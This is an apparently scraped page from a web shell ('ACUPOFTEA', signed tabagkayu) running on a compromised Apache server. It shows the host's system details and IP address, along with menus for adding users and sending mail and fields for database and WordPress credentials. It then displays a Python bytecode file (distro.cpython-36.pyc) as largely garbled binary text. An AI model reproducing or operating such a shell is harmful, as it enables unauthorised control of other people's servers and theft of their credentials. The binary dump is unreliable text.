System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
libexec
/
kcare
/
python
/
__pycache__
/
216.73.216.5
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
distro.cpython-36.pyc
3 � i�� � @ s( d Z ddlZddlZddlZddlZddlZddlZddlZddlZddl Z ddl mZmZm Z mZmZmZmZmZmZ yddl mZ W n ek r� eZY nX dZG dd� de�ZG dd � d e�Zejjd d�Zejjdd �ZdZddd�Zdddddd�Z ddiZ!ej"d�Z#ej"d�Z$dddddddddd d!d"d#d$d%d&gZ%d'd(d)ed*d+d,fZ&dce'ee(e(e(f d.�d/d0�Z)e(d1�d2d3�Z*dde'e(d5�d6d7�Z+dee'e'e(d8�d9d:�Z,dfe'ee(e(e(f d;�d<d=�Z-dge'e(d;�d>d?�Z.dhe'e(d;�d@dA�Z/die'e(d;�dBdC�Z0e(d1�dDdE�Z1e(d1�dFdG�Z2dje'e'ed8�dHdI�Z3e e(e(f d1�dJdK�Z4e e(e(f d1�dLdM�Z5e e(e(f d1�dNdO�Z6e e(e(f d1�dPdQ�Z7e(e(dR�dSdT�Z8e(e(dR�dUdV�Z9e(e(dR�dWdX�Z:e(e(dR�dYdZ�Z;ydd[l<m=Z= W n$ ek �r� G d\d]� d]�Z=Y nX G d^d_� d_�Z>e>� Z?dd1�d`da�Z@eAdbk�r$e@� dS )ka� The ``distro`` package (``distro`` stands for Linux Distribution) provides information about the Linux distribution it runs on, such as a reliable machine-readable distro ID, or version information. It is the recommended replacement for Python's original :py:func:`platform.linux_distribution` function, but it provides much more functionality. An alternative implementation became necessary because Python 3.5 deprecated this function, and Python 3.8 removed it altogether. Its predecessor function :py:func:`platform.dist` was already deprecated since Python 2.6 and removed in Python 3.8. Still, there are many cases in which access to OS distribution information is needed. See `Python issue 1322 <https://bugs.python.org/issue1322>`_ for more information. � N) �Any�Callable�Dict�Iterable�Optional�Sequence�TextIO�Tuple�Type)� TypedDictz1.8.0c @ s e Zd ZU eeedS )�VersionDictN)�__name__� __module__�__qualname__�str�major�minor�build_number� r r �#/usr/libexec/kcare/python/distro.pyr = s r c @ s"